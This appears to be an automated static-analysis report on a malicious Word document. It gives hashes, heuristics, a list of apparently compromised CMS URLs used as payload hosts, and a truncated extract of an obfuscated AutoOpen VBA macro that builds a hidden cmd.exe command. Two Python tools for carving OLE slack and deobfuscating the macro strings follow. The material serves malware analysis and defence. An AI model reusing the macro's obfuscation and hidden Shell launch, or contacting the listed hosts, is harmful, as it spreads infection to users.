Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d20a41a8d80079fa…

Ver­dict: MALICIOUS
File type: Office (OLE)
Size: 280.9 KB (287,618 bytes)
Created: 2018-07-25 09:34:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: fdd41a3d54f97a164fccfd7fb3281233
SHA-1: 411f8e2824b73b21ca2ac1e5b69a088b396d64c4
SHA-256: d20a41a8d80079fa14a421b4d718384836697854f8cf32aacac5977437f25fa3
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample carries a VBA project whose AutoOpen procedure runs as soon as the document is opened with macros enabled. It calls Shell with window style 0 (hidden) on a command string assembled from the return values of dozens of helper functions, each padded with dead code (unused arithmetic, Rnd/Tan/Cos calls that error out under On Error Resume Next). The fragments visible in the extracted source assemble a nested cmd.exe invocation: "cm" plus "d ... /c", then "CMd /v: /c" (the /v: switch turns on delayed environment-variable expansion), a Chr(34) double quote, and "sEt '{@]=" followed by long runs of "/\_-" filler characters. The remainder of the command lies in the truncated part of the listing, so the second-stage download this structure points to is inferred from the shape of the command, not observed. The 1,070 URLs were extracted from the document body text, not from the macro; every one ends in mod_filezipr.php under wp-content/, wp-includes/ or administrator/components/ style paths, which is consistent with compromised CMS installs serving as payload hosts or C2. None has an established reputation, so treat them as leads to pivot on rather than confirmed indicators.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6735715-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6735715-0
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 287,618 bytes but its declared streams total only 147,264 bytes; the remaining 140,354 bytes (49%) lie in sectors that no stream chain references. That unallocated space is the classic hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached through a parser pointer-corruption bug in the document structure), so carve the unreferenced sectors and scan them for shellcode or an encoded PE before drawing a conclusion. On its own the figure is not proof of a parser exploit: a document edited in place also leaves stale, unreferenced sectors behind, and this sample already has an AutoOpen VBA macro that accounts for its execution path.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled (see the extracted macros.bas below).
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic description (written for the case where no modern VBA project was recovered and no stronger macro-virus family marker is present) does not fit this sample cleanly: a VBA project was recovered (macros.bas below) and it defines AutoOpen, so this marker duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence. It records the old Word macro execution surface; it is not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 50 URLs listed below were reached through the same channel: document text (OLE body).
    • http://www.dreamyartcreation.com/wp-content/themes/sketch/languages/mod_filezipr.php
    • http://www.sunriseclassic.net/wp-content/plugins/shiftnav-responsive-mobile-menu/admin/mod_filezipr.php
    • http://www.prexcolatino.com/wp-content/uploads/2016/05/mod_filezipr.php
    • http://www.mpkdk.sk/templates/dd_dreamnight_38/images/slideshow/mod_filezipr.php
    • http://www.4.sablecreations.com/ognerrte/wtuds/mod_filezipr.php
    • http://www.beauty2.mocksitetest.com/wp-includes/js/tinymce/utils/mod_filezipr.php
    • http://www.mudanzasyserviciosayala.com/wp-content/plugins/responsive-lightbox/assets/mod_filezipr.php
    • http://www.unde-iesim.ro/wp-includes/Text/Diff/Renderer/mod_filezipr.php
    • http://www.speed.webcoder.ch/bins/lib/bootstrap/fonts/mod_filezipr.php
    • http://www.grocery.uniqamart.com/wp-content/plugins/woocommerce-email-control/languages/mod_filezipr.php
    • http://www.forestspa.ro/old/insite/plugins/better-wp-security/mod_filezipr.php
    • http://www.sanjaykumar.us/wp-content/themes/gom-preum/css/mod_filezipr.php
    • http://www.bluebelllanenew.mcveighmedia.com/wp-content/themes/twentysixteen/css/mod_filezipr.php
    • http://www.handymanandatruck.com/wp-includes/js/tinymce/skins/mod_filezipr.php
    • http://www.hellomarrakeshnew.212dev.com/wp-content/themes/twentyseventeen/inc/mod_filezipr.php
    • http://www.hkiaa.org.hk/wp-content/plugins/admin-menu-manager/css/mod_filezipr.php
    • http://www.dario.rjhdesigns.net/wp-content/uploads/2018/03/mod_filezipr.php
    • http://www.clichy.212dev.com/wp-admin/css/colors/ocean/mod_filezipr.php
    • http://www.neselievim.com/wp-content/cache/wpfc-minified/mcnl8fcl/mod_filezipr.php
    • http://www.englishintuition.org/wp-content/plugins/mashsharer/templates/mod_filezipr.php
    • http://www.jeffandrus.com/rw_common/themes/Bold/images/mod_filezipr.php
    • http://www.swedmotor.seadministrator/components/com_tags/controllers/mod_filezipr.php
    • http://www.kimlongac.com/administrator/components/com_installer/models/mod_filezipr.php
    • http://www.ultrateknik.com/wp-content/themes/twentysixteen/css/mod_filezipr.php
    • http://www.mytrinityumc.org/wp-content/uploads/2018/04/mod_filezipr.php
    • http://www.warsawapartments.biz/test/images/babka_tower/ckrjhw/mod_filezipr.php
    • http://www.website-m.ru/wp-content/plugins/google-analytics-dashboard-for-wp/realtime/mod_filezipr.php
    • http://www.cranwood.mcveighmedia.com/wp-content/plugins/contact-form-7/includes/mod_filezipr.php
    • http://www.app-fellow.tiensamedia.com/wermure/wtuds/mod_filezipr.php
    • http://www.almelhemprees.com/wp-content/themes/twentyseventeen/inc/mod_filezipr.php
    • http://www.codepilates.com/wp-content/plugins/litespeed-cache/tpl/mod_filezipr.php
    • http://www.thesmilecraft.com/wp-content/plugins/squirrly-seo/classes/mod_filezipr.php
    • http://www.apolloniblom.com/wp-content/ew_backup/2015/06/mod_filezipr.php
    • http://www.ono.businessdemosite.com/wp-content/uploads/2018/09/mod_filezipr.php
    • http://www.trustorbit.com/wp-content/uploads1/2015/11/mod_filezipr.php
    • http://www.mobile.handymannexpress.com/lib/Zend/Gdata/Media/mod_filezipr.php
    • http://www.courses.jsswebdev.com/wp-includes/js/jquery/ui/mod_filezipr.php
    • http://www.test.vividlipi.com/wp-content/pluginsss/give/includes/mod_filezipr.php
    • http://www.kimiez.com/wp-includes/SimplePie/Content/Type/mod_filezipr.php
    • http://www.test5.ts.com.ps/wermure/wtuds/mod_filezipr.php
    • http://www.healthyproductrecipe.com/wp-admin/css/colors/blue/mod_filezipr.php
    • http://www.420productnews.com/wp-content/themes/twentyfourteen/page-templates/mod_filezipr.php
    • http://www.bdglory.com/wp-content/cache/object/9c5/mod_filezipr.php
    • http://www.dghsf.com/wp-content/themes/zenwater/inc/mod_filezipr.php
    • http://www.minhhai-exim.com/wp-content/plugins/advanced-custom-fields/core/mod_filezipr.php
    • http://www.travelphone.co.za/cgi-bin/.svn/tmp/wcprops/ini_mod_filezipr.php
    • http://www.inmobiliariaviviendas.com/wp-content/plugins/contact-form-7/admin/mod_filezipr.php
    • http://www.quidditchuk.imcatherinegrace.com/wp-content/plugins/jetpack/scss/mod_filezipr.php
    • http://www.blueprintpizzaupdate.mcveighmedia.com/wp-content/themes/twentythirteen/js/mod_filezipr.php
    • http://www.projectionscreen-tech.com/administrator/components/com_weblinks/helpers/mod_filezipr.php
    plus 1,020 more URLs not listed here (1,070 in total)
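The OLE_SLACK_ANOMALY figures above can be reproduced, and the slack carved for scanning, with a short Compound File Binary walk. The Python below is an added example, not part of the report's analysis engine: it reads the CFB header, FAT, DIFAT and directory, marks every sector that some chain references, and returns the rest as slack together with the carved bytes. The file it runs on is constructed inline (a single 4,096-byte stream whose name "WordDocument" and sizes are assumptions, plus four sectors nothing references) so that the script works offline; it handles version-3 files (512-byte sectors) only.

```python
"""Added example (not the report's own analysis code): measure CFB/OLE slack,
the sectors no FAT chain reaches. Handles version-3 files (512-byte sectors).
The sample file is constructed inline so the script runs offline."""
import struct

MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, FATSECT, ENDOFCHAIN, NOSTREAM = 0xFFFFFFFF, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
STREAM, ROOT = 2, 5


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def _chain(fat, start, n_sect):
    """Follow a FAT chain from `start`; stop at end markers, ids past EOF, or loops."""
    seen, sect = [], start
    while sect < n_sect and sect not in seen:
        seen.append(sect)
        sect = fat[sect] if sect < len(fat) else ENDOFCHAIN
    return seen


def ole_slack(data):
    """Account for every sector of `data` and return declared stream bytes,
    referenced/unreferenced sector counts, and the unreferenced bytes carved out."""
    if data[:8] != MAGIC:
        raise ValueError("not a CFB/OLE file")
    ssz = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    n_sect = (len(data) - ssz) // ssz                # sectors after the header

    def sector(n):
        return data[(n + 1) * ssz:(n + 2) * ssz]

    # FAT sector ids: 109 DIFAT slots in the header, then the DIFAT sector chain.
    fat_sects = [s for s in (_u32(data, 0x4C + 4 * i) for i in range(109)) if s < n_sect]
    difat, s = [], _u32(data, 0x44)
    while s < n_sect and s not in difat:
        difat.append(s)
        blk = sector(s)
        fat_sects += [x for x in (_u32(blk, 4 * i) for i in range(ssz // 4 - 1)) if x < n_sect]
        s = _u32(blk, ssz - 4)                       # last slot links the next DIFAT sector
    fat = [_u32(sector(f), 4 * i) for f in fat_sects for i in range(ssz // 4)]

    referenced = set(fat_sects) | set(difat)
    referenced |= set(_chain(fat, _u32(data, 0x3C), n_sect))       # mini-FAT sectors
    dir_chain = _chain(fat, _u32(data, 0x30), n_sect)               # directory sectors
    referenced |= set(dir_chain)
    cutoff, declared = _u32(data, 0x38), 0
    for d in dir_chain:
        blk = sector(d)
        for off in range(0, ssz, 128):                               # one directory entry each
            kind, start, size = blk[off + 0x42], _u32(blk, off + 0x74), _u32(blk, off + 0x78)
            if kind == STREAM:
                declared += size
            if kind == ROOT or (kind == STREAM and size >= cutoff):   # mini-stream container or big stream
                referenced |= set(_chain(fat, start, n_sect))
    unref = sorted(set(range(n_sect)) - referenced)
    return {"file_size": len(data), "declared_stream_bytes": declared,
            "referenced_sectors": len(referenced), "unreferenced_sectors": len(unref),
            "slack_bytes": len(unref) * ssz, "slack_ratio": len(unref) * ssz / len(data),
            "carved": b"".join(sector(n) for n in unref)}


def build_sample_cfb(payload=b"A" * 4096, slack=b"\x90" * 2048):
    """Constructed v3 CFB, not a real document: FAT in sector 0, directory in sector 1,
    one stream (assumed name 'WordDocument') from sector 2, then `slack` as sectors
    nothing references. `payload` must be a multiple of 512 and at least 4,096 bytes."""
    ssz, n = 512, len(payload) // 512
    hdr = bytearray(ssz)
    hdr[0:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)          # version, byte order, shifts
    struct.pack_into("<8I", hdr, 0x28, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN)
    hdr[0x4C:ssz] = struct.pack("<109I", 0, *([FREESECT] * 108))         # DIFAT: FAT lives in sector 0
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, n + 2)) + [ENDOFCHAIN]   # dir, then the stream chain
    fat += [FREESECT] * (ssz // 4 - len(fat))

    def entry(name, kind, child, start, size):
        e, raw = bytearray(128), name.encode("utf-16-le") + b"\x00\x00"
        e[0:len(raw)] = raw
        struct.pack_into("<HBBIII", e, 0x40, len(raw), kind, 1, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 0x74, start, size)
        return e

    directory = entry("Root Entry", ROOT, 1, ENDOFCHAIN, 0) + entry("WordDocument", STREAM, NOSTREAM, 2, len(payload))
    directory += bytes(ssz - len(directory))
    return bytes(hdr) + struct.pack("<128I", *fat) + bytes(directory) + payload + slack


if __name__ == "__main__":
    result = ole_slack(build_sample_cfb())
    print({k: v for k, v in result.items() if k != "carved"})
```

Against a real file, call ole_slack(open(path, "rb").read()); the "carved" bytes are what to hand to an XOR/ROL brute-forcer or a PE and shellcode scanner. Mini-stream contents are counted through the root entry's container chain, so small streams (below the 4,096-byte cutoff) are not mis-reported as slack, and the declared-bytes figure mirrors the report's "declared streams total" rather than the sector accounting.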

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29,723 bytes
SHA-256: 831614cd71219df8270d1591dba916d447de8f28a6c1285cc7561766d30988b2

Preview of the extracted script (first 1,000 lines; the listing is cut off below):
Attribute VB_Name = "jovqOBvRlNiVR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   MJjaaH = SrzLBh
   TwYpd = CInt(FjzBj / ZzUKNO * 22030 - hQFSJl)
   uSrnF = 6
wMYIzu = "" + MvMVUIGZN + RzzzQipROnucPw + CVar("cm") + CUhRviLXzwY + DHNLKdV + UIzWwNJL + uTAvWVmp + hQqafY + tSJJEbjfzB + izvaAvGAmP + SOFJuJaEO + ianZnrivkS + vZDKCH + wDMhH + EGjJhOqrk + lUMFX + YYjizjCt + OqCbYKOQaS + RYChw + aNDaSPHasQv + GqfXVKsnm + iWCddKj + SDVHwnicz + lflGdnRMqRY + wCVNHkNZT + YuNliTfZY + HtbXa + bHmVdV + iOOQT + VGQrzww + CKnZks + DdBvD + RqTQibQWN + JdUbOITBWT + iWYrkMLij + zajJrhOX + FEIGUiLKbR + lJHtrLSnmF + SnqSzzuQoU + KjGShTf + ltBbWwG + hlnMJDiBPLq + mdCuwmM + ZIchFfzzm + BhNIuiTAZHiYuw
   XtHEU = 311
   rGjsB = CBool(5)
Shell@ wMYIzu, 0
   aoLiA = Cos(4874)
End Sub


Attribute VB_Name = "YaRCzHvjhlTcHt"
Function UIzWwNJL()
On Error Resume Next
pVACZ = HSdsnf
   mJozl = Tan(QrIbjZ)
oMUAvlYns = "d" + "     " + "   " + "       " + "/c       "
LJOfVD = CBool(501)
PwqWjj = "  " + "      C" + "Md  /v:   " + "   /" + "c" + "  " + CStr(Chr(sViAWzlZ + owfLcccnOWbdLQ + 34 + BRiakHGuVF + TaqdscXLms)) + " sEt  " + " '{@]"
zbzwN = Sin(SzkGU)
   wWDfN = 816
   bWLVN = CLng(60)
nQwiJw = "=\_\_" + "---/-\_\/"
zFRjV = 233439149
   PZliT = 3364
WNzQnYIZrOs = "_/ /"
ktzHvh = 40
   qikYm = Rnd(32873 * XErOo * 94395 + wKvFzb)
   orFUhB = UuTJw
knGAXnff = "/\_" + "-" + "_-\\" + "\"
UIzWwNJL = oMUAvlYns + PwqWjj + nQwiJw + WNzQnYIZrOs + knGAXnff
   ODYll = Rnd(62815 * 24518)
   uFica = Tan(NHjlzq + SRjCMk)
   iBrUaB = CDate(qjkjz)
End Function
Function uTAvWVmp()
On Error Resume Next
KJzJRNGo = "--/__"
HCfdb = CLng(96462 - hBquj * 69058 / bRoPDH)
   lqajYs = Log(5)
   rMPEmI = jGQABQ
FtOqDwjuOr = " -/" + "_/_\-" + "\" + "--\//_\ " + "\" + "//_-\-_\/" + "_-/-\ -\_\"
QQlFa = Rnd(95)
   IfuhSd = CBool(OtibiN)
mcmDFYXVjwZ = "-/-_//\_-" + "_/ \/_/" + "//_\" + "_-" + "--_-\ /\_-" + "_-_/--"
jlMsO = Chr(24655 * sqlYiP)
   IwZZV = jsiwY
   PFiwM = Hex(2)
FZYqdYjvCH = "\_/\\" + " \-\\/" + "/" + "_" + "_/-/"
ofdkNz = 4
   vzQWSL = GkdCDl
pMkiUDCXpaC = "-_" + "\- \/" + "\/_\/_-" + "\/-__- -_" + "-\/\"
QnDtiw = UUtuoI
QVvoMvFaUpA = "\_-_" + "///\- " + "//-_" + "_--\_-\/" + "/_\"
uTAvWVmp = KJzJRNGo + FtOqDwjuOr + mcmDFYXVjwZ + FZYqdYjvCH + pMkiUDCXpaC + QVvoMvFaUpA
   GBOvXR = vztQvH
End Function
Function hQqafY()
On Error Resume Next
EjTjGH = Oct(SiPzAH)
   fvNMrf = Sgn(7)
   XdFiH = CByte(cnnhj)
zPFaFT = " -" + "-" + "_\_///-" + "\\-\/_ _/-" + "\\-\/\-_/-"
GIaQaHS = "__ --_//__" + "--_/\\\" + "\ -\/_\"
OruhHWmjOv = "-/_\" + "/-\/-_" + " _/-/\\"
MNlEY = WaQFCw
   SVDYa = Cos(pivFv / zPAAF + tNGdAJ - HsUWAK)
QHVfjmqmKU = "\" + "/-_" + "_/\-- --\" + "/-//" + "\/\_\-__ -"
HzQSM = "-/\___/\//" + "\_\-}\\/-_" + "_/-_//_\\"
MMmiXQ = CStr(oVujS)
TSEizDTmBE = "-"
hQqafY = zPFaFT + GIaQaHS + OruhHWmjOv + QHVfjmqmKU + HzQSM + TSEizDTmBE
   uuHKl = 856
End Function
Function tSJJEbjfzB()
On Error Resume Next
UZMIK = CDbl(7)
   hFWnpY = 9052
CPmQviWiwz = "}\\/" + "/_\\" + "_-" + "-_/--_{_"
YZbAmp = Sqr(OjkOpV)
   lLZPJ = Tan(YHEFKH + NwiwQE / BcLPYi - sCNBf)
ljWAJQbAmzq = "-//" + "__-\/\" + "--/\\h_/\" + "/_/\-" + "/" + "\-_--_c_"
blqOvduv = "\_" + "/\/-\--"
LuJzPI = Log(20)
FWVOUMU = "/" + "\/-_t//" + "_\--\_/" + "/\--\_a" + "\-_\\__-" + "-/-"
tSJJEbjfzB = CPmQviWiwz + ljWAJQbAmzq + blqOvduv + FWVOUMU
   EPUBH = VcQZS
   ajjErE = Int(owoWCv * PzmtbB)
End Function
Function izvaAvGAmP()
On Error Resume Next
AJsfj = 42
EutHi = "///\c/-\_/" + "-_\_\/_" + "-/-}/\_/\" + "\___-/--\-" + ";_-/_--" + "//\\-/" + "\\_k\_/-"
pvpiD = "_" + "\//" + "_-_-\\/a-" + "\/\/_" + "-/-\" + "-\_/" + "_e-_\_-"
GfPQu = CBool(cPYII)
SkWYMjjKpT = "\-/_/\" + "//-\r-//" + "_\_\_\-_-/" + "/\b--\_//" + "\-_//\__-" + ";//\/\-_-" + "\\/_-_-h"
wknSG = Hex(cBvShr / IplrbU)
  
... (truncated)
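The string-building pattern in the listing above (dozens of functions returning literal fragments, Chr() applied to sums of never-assigned variables, junk statements that fail harmlessly under On Error Resume Next, and a final hidden Shell call) can be resolved statically, without opening the document in Word. The Python below is an added example, not the report's own tooling: a minimal emulator of the VBA Variant rules this obfuscator relies on that runs the Sub/Function blocks, records the argument of every Shell call instead of executing it, and returns the reassembled command. SAMPLE_MACRO is a constructed excerpt modelled on macros.bas (the UIzWwNJL string pieces are the page's own; the AutoOpen body is shortened), and the emulator covers only the subset in use here: "+" concatenation and subtraction, Chr/CStr/CVar, parentheses and calls. Anything else makes the statement error out and get skipped, which is exactly what the junk lines do in Word.

```python
# Added example (not the report's tooling); SAMPLE_MACRO is a constructed excerpt modelled on macros.bas above.
import re

TOKEN = re.compile(r'("(?:[^"]|"")*")|(\d+(?:\.\d+)?)|([A-Za-z_]\w*)[@$%&!#]?|([-+*/(),])')
BUILTINS = {"chr": lambda a: chr(int(_num(a[0]))), "cvar": lambda a: a[0], "cstr": lambda a: "" if a[0] is None else str(a[0])}

def _num(v):   # VBA numeric coercion: Empty -> 0, numeric string -> number, other strings raise
    return 0 if v is None else (float(v) if isinstance(v, str) else v)

def _add(a, b):   # VBA "+": concatenation once a string is involved (Empty acts as ""), else arithmetic
    if isinstance(a, str) or isinstance(b, str):
        return ("" if a is None else a) + ("" if b is None else b)   # str + number raises, as in VBA
    return _num(a) + _num(b)

def tokenize(text):
    return [("str", s[1:-1].replace('""', '"')) if s else ("num", float(n) if "." in n else int(n))
            if n else ("id", i) if i else ("op", o) for s, n, i, o in TOKEN.findall(text)]

def evaluate(emu, text, env):
    # Recursive descent over + and -, atoms, (...) and calls; anything else raises and run() skips the statement.
    toks = tokenize(text) + [("end", None)]
    def expr():
        v = atom()
        while toks[0][0] == "op" and toks[0][1] in "+-":
            op, r = toks.pop(0)[1], atom()
            v = _add(v, r) if op == "+" else _num(v) - _num(r)
        return v
    def atom():
        kind, val = toks.pop(0)
        if kind in ("str", "num"):
            return val
        if kind == "op" and val == "(":
            v = expr()
            toks.pop(0)                                     # closing ')'
            return v
        if kind != "id":
            raise SyntaxError(str(val))
        if val.lower() in env:
            return env[val.lower()]
        args = []                                           # Name(args) or a bare Name
        if toks[0] == ("op", "("):
            toks.pop(0)
            args = [] if toks[0] == ("op", ")") else [expr()]
            while toks.pop(0) == ("op", ","):
                args.append(expr())
        return emu.call(val, args)
    return expr()

class VbaEmu:
    def __init__(self, source):
        self.procs, self.shell_calls, cur = {}, [], None
        for s in map(str.strip, source.splitlines()):
            m = re.match(r"(End\s+(?:Sub|Function)\b)|(?:(?:Public|Private)\s+)?(?:Sub|Function)\s+(\w+)", s, re.I)
            if m:
                cur = None if m.group(1) else self.procs.setdefault(m.group(2).lower(), [])
            elif cur is not None and s:
                cur.append(s)

    def call(self, name, args):
        key = name.lower()
        if key == "shell":                       # record Shell(cmd, style) instead of running it
            self.shell_calls.append(args[0])
            return 0
        if key in self.procs:                    # user function; runaway recursion raises and is skipped
            return self.run(key)
        if key in BUILTINS:
            return BUILTINS[key](args)
        if args:                                 # unmodelled call (Cos, Rnd, CBool, ...): statement errors
            raise NameError(name)
        return None                              # never-assigned name: Empty

    def run(self, name):
        env = {}
        for stmt in self.procs[name.lower()]:
            m = re.match(r"Shell[@$%&!#]?\s+(.*)", stmt, re.I)   # statement form: Shell@ cmd, 0
            if m:
                stmt = "__r = Shell(" + m.group(1) + ")"
            m = re.match(r"(\w+)\s*=\s*(.*)", stmt)
            if m:
                try:
                    env[m.group(1).lower()] = evaluate(self, m.group(2), env)
                except Exception:
                    pass                         # the statement errored: Resume Next
        return env.get(name.lower())

def recover_shell_commands(source, entry="AutoOpen"):
    emu = VbaEmu(source)
    emu.run(entry)
    return emu.shell_calls

SAMPLE_MACRO = r'''
Sub AutoOpen()
On Error Resume Next
   TwYpd = CInt(FjzBj / ZzUKNO * 22030 - hQFSJl)
wMYIzu = "" + MvMVUIGZN + CVar("cm") + UIzWwNJL
Shell@ wMYIzu, 0
End Sub
Function UIzWwNJL()
oMUAvlYns = "d" + "     " + "/c       "
PwqWjj = "  " + "      C" + "Md  /v:   " + "   /" + "c" + "  " + CStr(Chr(sViAWzlZ + owfLcccnOWbdLQ + 34 + BRiakHGuVF + TaqdscXLms)) + " sEt  " + " '{@]"
UIzWwNJL = oMUAvlYns + PwqWjj + "=\_\_" + "---/-\_\/"
End Function
'''
```

recover_shell_commands(SAMPLE_MACRO) returns a single string which, with the padding whitespace collapsed, reads: cmd /c CMd /v: /c " sEt '{@]=\_\_---/-\_\/ . The Chr(34) resolves because every unassigned name in its argument is Empty and therefore 0 in arithmetic, and MvMVUIGZN contributes nothing for the same reason in string context. To run this on the real macros.bas, pass the file contents as source; the junk calls (Rnd, Cos, CBool, Tan, ...) only ever feed assignments that the command string never reads, so skipping them as On Error Resume Next would leaves the string path intact.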